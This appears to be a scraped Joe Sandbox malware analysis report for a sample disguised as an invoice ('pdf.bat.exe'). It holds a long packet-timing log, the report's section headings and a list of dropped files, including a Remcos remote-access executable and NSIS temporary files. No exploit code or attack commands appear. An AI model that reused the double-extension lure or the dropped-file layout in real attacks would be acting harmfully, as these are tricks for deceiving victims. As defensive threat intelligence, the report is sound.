Mar 16, 2025 22:29:03.026118994 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.026192904 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.028384924 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.028438091 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.028490067 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.028538942 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.030638933 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.030689955 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.030726910 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.030775070 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.032974005 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.033021927 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.033030033 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.033077002 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.035254002 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.035319090 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.035348892 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.035393953 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.037559032 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.037621021 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.037627935 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.037681103 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.039877892 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.039921999 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.039930105 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.039973021 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.042190075 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.042232990 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.042238951 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.042293072 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.044611931 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.044681072 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.044691086 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.044739962 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.046793938 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.046839952 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.046847105 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.046911955 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.049082041 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.049129009 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.049135923 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.049180031 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.051384926 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.051433086 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.051440001 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.051485062 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.053647995 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.053709984 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.053738117 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.053782940 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.055939913 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.055989981 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.056114912 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.056164980 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.058238983 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.058310032 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.058378935 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.058429003 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.060563087 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.060643911 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.060650110 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.060730934 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.062882900 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.062926054 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.062932014 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.062973022 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.065200090 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.065247059 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.065252066 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.065299988 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.067337990 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.067389011 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.067446947 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.067492008 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.070343018 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.070406914 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.070413113 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.070456982 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.071909904 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.071964979 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.071971893 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.072010040 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.075316906 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.075377941 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.075386047 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.075431108 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.076505899 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.076550961 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.076556921 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.076601028 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.079998016 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.080080986 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.080089092 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.080133915 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.081005096 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.081051111 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.081173897 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.081223011 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.084523916 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.084573984 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.084580898 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.084619999 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.085455894 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.085503101 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.085577011 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.085621119 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.088665009 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.088710070 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.088716030 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.088753939 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.089915037 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.089962959 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.089970112 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.090049982 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.093204975 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.093267918 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.093343973 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.093389988 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.094223976 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.094285011 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.094290018 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.094327927 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.094332933 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.094424009 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.096688986 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.096739054 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.096745968 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.096786022 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.098526001 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.098588943 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.098594904 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.098637104 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.102205992 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.102253914 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.102260113 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.102314949 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.103220940 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.103277922 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.103282928 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.103347063 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.105875015 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.105927944 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.105935097 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.105997086 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.109450102 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.109505892 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.109513998 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.109560966 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.110264063 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.110323906 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.110330105 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.110378981 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.112056971 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.112128973 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.112134933 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.112175941 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.113704920 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.113754034 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.113760948 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.113806009 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.115437031 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.115511894 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.115519047 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.115569115 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.117086887 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.117149115 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.117155075 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.117214918 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.119200945 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.119263887 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.119271040 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.119321108 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.120405912 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.120467901 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.120475054 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.120521069 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.122133017 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.122195959 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.122203112 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.122247934 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.123598099 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.123655081 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.123677015 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.123738050 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.125159025 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.125214100 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.125221014 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.125298977 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.126715899 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.126770020 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.126777887 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.126822948 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.128202915 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.128248930 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.128256083 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.128298044 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.129684925 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.129750967 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.129757881 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.129805088 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.131155968 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.131217003 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.131222963 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.131272078 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.132595062 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.132652044 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.132658005 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.132704020 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.134040117 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.134098053 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.134104967 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.134151936 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.135354042 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.135412931 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.135415077 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.135428905 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.135452986 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.135488987 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.136774063 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.136835098 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.136842012 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.136889935 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.138150930 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.138216019 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.138222933 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.138272047 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.139456034 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.139513969 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.139533043 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.139578104 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.140785933 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.140845060 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.140851021 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.140897989 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.142072916 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.142136097 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.142142057 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.142214060 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.143294096 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.143392086 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.143404007 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.143448114 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.144592047 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.144640923 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.144735098 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.144779921 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.146795034 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.146847010 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.146864891 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.146933079 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.149096966 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.149152994 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.149158955 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.149198055 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.149205923 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.149213076 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.149234056 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.149303913 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.153711081 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.153790951 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.153798103 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.153836966 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.153846979 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.153852940 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.153877020 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.153904915 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.154172897 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.154232979 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.154242039 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.154293060 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.160518885 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.160577059 CET	49728	443	192.168.2.4	142.250.185.225
Mar 16, 2025 22:29:03.160583019 CET	443	49728	142.250.185.225	192.168.2.4
Mar 16, 2025 22:29:03.160619020 CET	443	49728

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ORIGINAL INVOICE COAU7230734290 pdf.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Remcos\remcos.exe

C:\ProgramData\Remcos\remcos.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\Bombardementernes.Mon220

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\Hndernes.noc

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\Overhalingens.Rst147

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\meniscate.jpg

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\sulfonamid.red

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\udskilningslbs.skr

C:\Users\user\AppData\Local\Temp\gennemgangs\Hokuspokus\unentreating.txt

C:\Users\user\AppData\Local\Temp\nsd1A26.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsg5579.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsi4F73.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nssA4F1.tmp\System.dll

Static File Info

General

Windows Analysis Report
ORIGINAL INVOICE COAU7230734290 pdf.bat.exe